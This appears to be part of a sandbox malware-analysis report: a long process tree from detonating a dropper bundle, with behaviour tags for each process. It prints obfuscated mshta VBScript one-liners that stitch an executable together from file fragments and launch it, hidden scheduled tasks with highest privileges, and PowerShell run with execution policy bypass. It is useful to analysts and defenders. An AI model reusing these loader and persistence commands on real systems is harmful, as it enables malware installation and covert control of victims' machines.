                                                      "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1628,12411407215554138809,17513683587530290634,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3776_2003539583" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2612 /prefetch:1
                                                      10⤵
                                                      • Executes dropped EXE
                                                      • Checks computer location settings
                                                      • Loads dropped DLL
                                                      PID:5560
                                                    • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                      "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1628,12411407215554138809,17513683587530290634,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3776_2003539583" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3460 /prefetch:2
                                                      10⤵
                                                      • Loads dropped DLL
                                                      PID:6508
                                                    • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                      "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1628,12411407215554138809,17513683587530290634,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3776_2003539583" --mojo-platform-channel-handle=1772 /prefetch:8
                                                      10⤵
                                                        PID:6616
                                                      • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1628,12411407215554138809,17513683587530290634,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3776_2003539583" --mojo-platform-channel-handle=3616 /prefetch:8
                                                        10⤵
                                                          PID:6844
                                                  • C:\Users\Admin\Pictures\Adobe Films\Tef3DGGjx2AbeoN9M0D0wS25.exe
                                                    "C:\Users\Admin\Pictures\Adobe Films\Tef3DGGjx2AbeoN9M0D0wS25.exe"
                                                    7⤵
                                                    • Executes dropped EXE
                                                    PID:4796
                                                    • C:\Users\Admin\AppData\Local\Temp\is-OEPRG.tmp\Tef3DGGjx2AbeoN9M0D0wS25.tmp
                                                      "C:\Users\Admin\AppData\Local\Temp\is-OEPRG.tmp\Tef3DGGjx2AbeoN9M0D0wS25.tmp" /SL5="$50314,506127,422400,C:\Users\Admin\Pictures\Adobe Films\Tef3DGGjx2AbeoN9M0D0wS25.exe"
                                                      8⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      PID:764
                                                      • C:\Users\Admin\AppData\Local\Temp\is-M9FJ4.tmp\DYbALA.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\is-M9FJ4.tmp\DYbALA.exe" /S /UID=2709
                                                        9⤵
                                                        • Drops file in Drivers directory
                                                        • Executes dropped EXE
                                                        • Adds Run key to start application
                                                        • Drops file in Program Files directory
                                                        PID:2784
                                                        • C:\Users\Admin\AppData\Local\Temp\33-c1b9f-a0f-687a8-43eee10b1fc8c\Kivaqufiro.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\33-c1b9f-a0f-687a8-43eee10b1fc8c\Kivaqufiro.exe"
                                                          10⤵
                                                          • Executes dropped EXE
                                                          • Checks computer location settings
                                                          PID:4268
                                                        • C:\Users\Admin\AppData\Local\Temp\58-5ddd9-60a-8d88a-b1ae3ab84c925\Naecizhomaecy.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\58-5ddd9-60a-8d88a-b1ae3ab84c925\Naecizhomaecy.exe"
                                                          10⤵
                                                          • Executes dropped EXE
                                                          PID:2156
                                                          • C:\Windows\System32\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lcltgfcd.52d\GcleanerEU.exe /eufive & exit
                                                            11⤵
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:4796
                                                          • C:\Windows\System32\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kd3txg11.5k5\installer.exe /qn CAMPAIGN="654" & exit
                                                            11⤵
                                                              PID:932
                                                              • C:\Users\Admin\AppData\Local\Temp\kd3txg11.5k5\installer.exe
                                                                C:\Users\Admin\AppData\Local\Temp\kd3txg11.5k5\installer.exe /qn CAMPAIGN="654"
                                                                12⤵
                                                                • Executes dropped EXE
                                                                • Loads dropped DLL
                                                                • Enumerates connected drives
                                                                • Modifies system certificate store
                                                                • Suspicious use of FindShellTrayWindow
                                                                PID:2196
                                                                • C:\Windows\SysWOW64\msiexec.exe
                                                                  "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\kd3txg11.5k5\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\kd3txg11.5k5\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1636307992 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                                                  13⤵
                                                                    PID:4388
                                                              • C:\Windows\System32\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qc0dmfm4.n0u\any.exe & exit
                                                                11⤵
                                                                  PID:5076
                                                                  • C:\Users\Admin\AppData\Local\Temp\qc0dmfm4.n0u\any.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\qc0dmfm4.n0u\any.exe
                                                                    12⤵
                                                                    • Executes dropped EXE
                                                                    PID:2888
                                                                    • C:\Users\Admin\AppData\Local\Temp\qc0dmfm4.n0u\any.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\qc0dmfm4.n0u\any.exe" -u
                                                                      13⤵
                                                                      • Executes dropped EXE
                                                                      PID:5196
                                                                • C:\Windows\System32\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cnmfhquf.1l3\gcleaner.exe /mixfive & exit
                                                                  11⤵
                                                                  • Suspicious use of SetWindowsHookEx
                                                                  PID:3548
                                                                • C:\Windows\System32\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\k5yvjhal.rsz\autosubplayer.exe /S & exit
                                                                  11⤵
                                                                    PID:5352
                                                                    • C:\Users\Admin\AppData\Local\Temp\k5yvjhal.rsz\autosubplayer.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\k5yvjhal.rsz\autosubplayer.exe /S
                                                                      12⤵
                                                                      • Executes dropped EXE
                                                                      • Loads dropped DLL
                                                                      • Drops file in Program Files directory
                                                                      PID:5592
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdB7E5.tmp\tempfile.ps1"
                                                                        13⤵
                                                                          PID:6492
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdB7E5.tmp\tempfile.ps1"
                                                                          13⤵
                                                                            PID:6924
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdB7E5.tmp\tempfile.ps1"
                                                                            13⤵
                                                                              PID:7004
                                                                      • C:\Program Files\Windows Defender Advanced Threat Protection\MBGRRXFECK\foldershare.exe
                                                                        "C:\Program Files\Windows Defender Advanced Threat Protection\MBGRRXFECK\foldershare.exe" /VERYSILENT
                                                                        10⤵
                                                                        • Executes dropped EXE
                                                                        PID:2316
                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                                                                6⤵
                                                                • Creates scheduled task(s)
                                                                PID:4992
                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                                                                6⤵
                                                                • Creates scheduled task(s)
                                                                PID:4724
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c Sat02157abd1f073be.exe /mixone
                                                          3⤵
                                                            PID:2064
                                                            • C:\Users\Admin\AppData\Local\Temp\7zS4A885C56\Sat02157abd1f073be.exe
                                                              Sat02157abd1f073be.exe /mixone
                                                              4⤵
                                                              • Executes dropped EXE
                                                              PID:428
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 428 -s 660
                                                                5⤵
                                                                • Program crash
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:4896
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 428 -s 676
                                                                5⤵
                                                                • Program crash
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:4148
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 428 -s 712
                                                                5⤵
                                                                • Program crash
                                                                PID:5100
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 428 -s 812
                                                                5⤵
                                                                • Program crash
                                                                PID:4388
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 428 -s 836
                                                                5⤵
                                                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                • Program crash
                                                                PID:4484
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c Sat026a6f5b1555e.exe
                                                            3⤵
                                                              PID:1584
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c Sat02d28fb2325.exe
                                                              3⤵
                                                                PID:1308
                                                                • C:\Users\Admin\AppData\Local\Temp\7zS4A885C56\Sat02d28fb2325.exe
                                                                  Sat02d28fb2325.exe
                                                                  4⤵
                                                                  • Executes dropped EXE
                                                                  PID:3004
                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                    "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS4A885C56\Sat02d28fb2325.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS4A885C56\Sat02d28fb2325.exe"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
                                                                    5⤵
                                                                      PID:4180
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2732 -s 604
                                                                  3⤵
                                                                  • Program crash
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:1480
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c Sat020ba6af3ac994a1.exe
                                                                  3⤵
                                                                    PID:3692
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c Sat020785ce73a.exe
                                                                    3⤵
                                                                      PID:3132
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c Sat0295e1f5fc7a4d17.exe
                                                                      3⤵
                                                                      • Suspicious use of WriteProcessMemory
                                                                      PID:3552
                                                                • c:\windows\system32\svchost.exe
                                                                  c:\windows\system32\svchost.exe -k netsvcs -s Browser
                                                                  1⤵
                                                                    PID:2560
                                                                  • c:\windows\system32\svchost.exe
                                                                    c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                                                                    1⤵
                                                                      PID:2388
                                                                    • c:\windows\system32\svchost.exe
                                                                      c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                                                                      1⤵
                                                                        PID:2356
                                                                      • c:\windows\system32\svchost.exe
                                                                        c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                                                                        1⤵
                                                                          PID:1820
                                                                        • c:\windows\system32\svchost.exe
                                                                          c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                                                                          1⤵
                                                                            PID:1400
                                                                          • c:\windows\system32\svchost.exe
                                                                            c:\windows\system32\svchost.exe -k netsvcs -s Themes
                                                                            1⤵
                                                                              PID:1224
                                                                            • c:\windows\system32\svchost.exe
                                                                              c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                                                                              1⤵
                                                                                PID:1116
                                                                              • c:\windows\system32\svchost.exe
                                                                                c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                                                                                1⤵
                                                                                • Drops file in System32 directory
                                                                                PID:1044
                                                                              • c:\windows\system32\svchost.exe
                                                                                c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                                                                1⤵
                                                                                  PID:380
                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS4A885C56\Sat0295e1f5fc7a4d17.exe
                                                                                  Sat0295e1f5fc7a4d17.exe
                                                                                  1⤵
                                                                                  • Executes dropped EXE
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:2300
                                                                                • C:\Users\Admin\AppData\Local\Temp\is-T3TI7.tmp\Sat02f65b56a11b4e15e.tmp
                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-T3TI7.tmp\Sat02f65b56a11b4e15e.tmp" /SL5="$20190,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS4A885C56\Sat02f65b56a11b4e15e.exe"
                                                                                  1⤵
                                                                                  • Executes dropped EXE
                                                                                  • Loads dropped DLL
                                                                                  PID:2720
                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS4A885C56\Sat02f65b56a11b4e15e.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\7zS4A885C56\Sat02f65b56a11b4e15e.exe" /SILENT
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:1540
                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-AKM62.tmp\Sat02f65b56a11b4e15e.tmp
                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-AKM62.tmp\Sat02f65b56a11b4e15e.tmp" /SL5="$4003A,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS4A885C56\Sat02f65b56a11b4e15e.exe" /SILENT
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      • Loads dropped DLL
                                                                                      PID:1668
                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS4A885C56\Sat020785ce73a.exe
                                                                                  Sat020785ce73a.exe
                                                                                  1⤵
                                                                                  • Executes dropped EXE
                                                                                  • Suspicious use of SetThreadContext
                                                                                  PID:2652
                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS4A885C56\Sat020785ce73a.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\7zS4A885C56\Sat020785ce73a.exe
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:4300
                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS4A885C56\Sat020785ce73a.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\7zS4A885C56\Sat020785ce73a.exe
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:4528
                                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                                  "C:\Windows\System32\mshta.exe" VbScRIPt: ClOsE ( CreatEObJEct ( "WsCrIPT.SheLL" ).rUn ( "CMD.eXe /R CoPY /y ""C:\Users\Admin\AppData\Local\Temp\7zS4A885C56\Sat02f10ffd5a.exe"" v1PLLMTR6Us.eXe &&sTArT V1PLLMTR6Us.EXE -Pfj2~BykFzhrErek &if """" =="""" for %r IN (""C:\Users\Admin\AppData\Local\Temp\7zS4A885C56\Sat02f10ffd5a.exe"" ) do taskkill -F -im ""%~nXr"" " , 0 , TRue ) )
                                                                                  1⤵
                                                                                    PID:1992
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /R CoPY /y "C:\Users\Admin\AppData\Local\Temp\7zS4A885C56\Sat02f10ffd5a.exe" v1PLLMTR6Us.eXe &&sTArT V1PLLMTR6Us.EXE -Pfj2~BykFzhrErek &if "" =="" for %r IN ("C:\Users\Admin\AppData\Local\Temp\7zS4A885C56\Sat02f10ffd5a.exe" ) do taskkill -F -im "%~nXr"
                                                                                      2⤵
                                                                                        PID:4192
                                                                                        • C:\Users\Admin\AppData\Local\Temp\v1PLLMTR6Us.eXe
                                                                                          V1PLLMTR6Us.EXE -Pfj2~BykFzhrErek
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:4476
                                                                                          • C:\Windows\SysWOW64\mshta.exe
                                                                                            "C:\Windows\System32\mshta.exe" VBscrIpt: CLoSE ( CReateObJect( "WsCriPT.shELL").RuN ( "C:\Windows\system32\cmd.exe /Q /c eCHo | SeT /P = ""MZ"" > ExEVJL.g & COPy /Y /B ExEVJL.G + U8U4.ZD + 2NJZD~L.hj +YG7HWLI_.4 CA~K8RAL.W & starT msiexec.exe /y .\CA~K8RAL.W & dEl U8U4.ZD 2NjZD~L.HJ YG7HWLI_.4 ExEVJL.G " , 0 ,True ) )
                                                                                            4⤵
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:4756
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              "C:\Windows\system32\cmd.exe" /Q /c eCHo | SeT /P = "MZ" > ExEVJL.g & COPy /Y /B ExEVJL.G + U8U4.ZD + 2NJZD~L.hj +YG7HWLI_.4 CA~K8RAL.W & starT msiexec.exe /y .\CA~K8RAL.W & dEl U8U4.ZD 2NjZD~L.HJ YG7HWLI_.4 ExEVJL.G
                                                                                              5⤵
                                                                                                PID:2536
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" eCHo "
                                                                                                  6⤵
                                                                                                    PID:4948
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /S /D /c" SeT /P = "MZ" 1>ExEVJL.g"
                                                                                                    6⤵
                                                                                                      PID:5052
                                                                                                    • C:\Windows\SysWOW64\msiexec.exe
                                                                                                      msiexec.exe /y .\CA~K8RAL.W
                                                                                                      6⤵
                                                                                                      • Loads dropped DLL
                                                                                                      PID:2700
                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                taskkill -F -im "Sat02f10ffd5a.exe"
                                                                                                3⤵
                                                                                                • Kills process with taskkill
                                                                                                PID:4756
                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS4A885C56\Sat020ba6af3ac994a1.exe
                                                                                            Sat020ba6af3ac994a1.exe
                                                                                            1⤵
                                                                                            • Executes dropped EXE
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:1848
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zS4A885C56\Sat02d28fb2325.exe" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zS4A885C56\Sat02d28fb2325.exe" ) do taskkill /F -Im "%~NxU"
                                                                                            1⤵
                                                                                              PID:4356
                                                                                              • C:\Users\Admin\AppData\Local\Temp\09xU.exE
                                                                                                09xU.EXE -pPtzyIkqLZoCarb5ew
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:4576
                                                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                                                  "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
                                                                                                  3⤵
                                                                                                    PID:4844
                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                    "C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " , 0 ,TRuE ) )
                                                                                                    3⤵
                                                                                                      PID:5040
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        "C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I
                                                                                                        4⤵
                                                                                                          PID:696
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" eCHO "
                                                                                                            5⤵
                                                                                                              PID:4976
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"
                                                                                                              5⤵
                                                                                                                PID:3924
                                                                                                              • C:\Windows\SysWOW64\control.exe
                                                                                                                control .\R6f7sE.I
                                                                                                                5⤵
                                                                                                                  PID:4352
                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                    "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I
                                                                                                                    6⤵
                                                                                                                    • Loads dropped DLL
                                                                                                                    PID:4092
                                                                                                                    • C:\Windows\system32\RunDll32.exe
                                                                                                                      C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I
                                                                                                                      7⤵
                                                                                                                        PID:3088
                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                          "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I
                                                                                                                          8⤵
                                                                                                                          • Loads dropped DLL
                                                                                                                          PID:768
                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                              taskkill /F -Im "Sat02d28fb2325.exe"
                                                                                                              2⤵
                                                                                                              • Kills process with taskkill
                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                              PID:4824
                                                                                                          • C:\Windows\SysWOW64\mshta.exe
                                                                                                            "C:\Windows\System32\mshta.exe" VbScRIPt: ClOsE ( CreatEObJEct ( "WsCrIPT.SheLL" ).rUn ( "CMD.eXe /R CoPY /y ""C:\Users\Admin\AppData\Local\Temp\v1PLLMTR6Us.eXe"" v1PLLMTR6Us.eXe &&sTArT V1PLLMTR6Us.EXE -Pfj2~BykFzhrErek &if ""-Pfj2~BykFzhrErek "" =="""" for %r IN (""C:\Users\Admin\AppData\Local\Temp\v1PLLMTR6Us.eXe"" ) do taskkill -F -im ""%~nXr"" " , 0 , TRue ) )
                                                                                                            1⤵
                                                                                                              PID:4592
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                "C:\Windows\System32\cmd.exe" /R CoPY /y "C:\Users\Admin\AppData\Local\Temp\v1PLLMTR6Us.eXe" v1PLLMTR6Us.eXe &&sTArT V1PLLMTR6Us.EXE -Pfj2~BykFzhrErek &if "-Pfj2~BykFzhrErek " =="" for %r IN ("C:\Users\Admin\AppData\Local\Temp\v1PLLMTR6Us.eXe" ) do taskkill -F -im "%~nXr"
                                                                                                                2⤵
                                                                                                                  PID:4880
                                                                                                              • C:\Windows\system32\rundll32.exe
                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                1⤵
                                                                                                                • Process spawned unexpected child process
                                                                                                                PID:4868
                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                  2⤵
                                                                                                                  • Loads dropped DLL
                                                                                                                  • Modifies registry class
                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  PID:4916
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE" ) do taskkill /F -Im "%~NxU"
                                                                                                                1⤵
                                                                                                                  PID:5092
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\5853.exe
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\5853.exe
                                                                                                                  1⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Drops startup file
                                                                                                                  PID:4480
                                                                                                                  • C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe
                                                                                                                    "C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"
                                                                                                                    2⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Suspicious behavior: AddClipboardFormatListener
                                                                                                                    PID:5052
                                                                                                                • C:\Windows\system32\rundll32.exe
                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                  1⤵
                                                                                                                  • Process spawned unexpected child process
                                                                                                                  PID:3428
                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                    2⤵
                                                                                                                    • Loads dropped DLL
                                                                                                                    • Modifies registry class
                                                                                                                    PID:3324
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\C900.exe
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\C900.exe
                                                                                                                  1⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:3440
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3440 -s 872
                                                                                                                    2⤵
                                                                                                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                    • Program crash
                                                                                                                    PID:432
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\1491.exe
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\1491.exe
                                                                                                                  1⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:3076
                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
                                                                                                                    2⤵
                                                                                                                      PID:4736
                                                                                                                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\quiseybx\quiseybx.cmdline"
                                                                                                                        3⤵
                                                                                                                          PID:5416
                                                                                                                          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBC68.tmp" "c:\Users\Admin\AppData\Local\Temp\quiseybx\CSC44C8D83067EB4EAAA788267FF7F6635C.TMP"
                                                                                                                            4⤵
                                                                                                                              PID:5764
                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                            3⤵
                                                                                                                              PID:7160
